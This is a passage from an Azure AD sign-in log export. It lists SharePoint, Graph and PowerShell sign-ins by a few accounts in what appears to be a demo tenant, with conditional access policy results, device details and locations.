{'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ca1de4aa-1783-40c1-890d-66bc08e81000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,ca1de4aa-1783-40c1-890d-66bc08e81000,SigninLogs,Sucess,33.7984581,-84.38828278
+1893,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:30.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7bc7469f-f0d2-0000-5d33-f5b475e025a4,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ca1de4aa-1783-40c1-890d-66bc05ea1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,ca1de4aa-1783-40c1-890d-66bc05ea1000,SigninLogs,Sucess,33.7984581,-84.38828278
+1894,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:44.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bd41abe2-ff8b-4707-bfcb-0bbde1f38a56,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ca1de4aa-1783-40c1-890d-66bc58ec1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,ca1de4aa-1783-40c1-890d-66bc58ec1000,SigninLogs,Sucess,33.7984581,-84.38828278
+1895,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:42.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,47e76f0e-b6db-470f-a4ab-9dbf42316846,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:13,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",9303d935-cf24-489a-bd00-a11c9df70f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,9303d935-cf24-489a-bd00-a11c9df70f00,SigninLogs,Sucess,38.73078156,-78.17196655
+1896,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:58.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0232103e-bc00-4e89-adc2-f058f8f373d6,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",23bcff85-732c-47fa-be9f-91d38b8b1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,23bcff85-732c-47fa-be9f-91d38b8b1100,SigninLogs,Sucess,33.7984581,-84.38828278
+1897,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:36.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0731e5a2-cb4a-448c-afd8-2daf538227d5,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",875c831a-2c9c-4e0a-b7c7-b830d70f1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,875c831a-2c9c-4e0a-b7c7-b830d70f1100,SigninLogs,Sucess,33.7984581,-84.38828278
+1898,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:56.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,90072,None,Other,0,64c5469f-d03e-0000-cd0c-8eb93846a599,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,,[],notApplied,08/04/2020 14:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 81.0.416'}",8680cefc-a188-4b38-a6de-913494154200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],"{'errorCode': 90072, 'failureReason': 'Other'}",PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,8680cefc-a188-4b38-a6de-913494154200,SigninLogs,Failed,38.47222137,-77.41989899
+1899,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:11.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b43ba508-b40b-4ddc-a3ee-48492a3eceb5,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 14:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5423bf62-9037-4448-bcaa-30334c5a0f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5423bf62-9037-4448-bcaa-30334c5a0f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1900,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:14.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,dc552806-3c86-4dbe-970f-80fa24f54356,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",dfcca72f-40c4-4044-85c7-4ddd1dd71100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,dfcca72f-40c4-4044-85c7-4ddd1dd71100,SigninLogs,Sucess,33.7984581,-84.38828278
+1901,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:30.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,99b34af1-2631-43d0-8b58-373383cb9f59,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 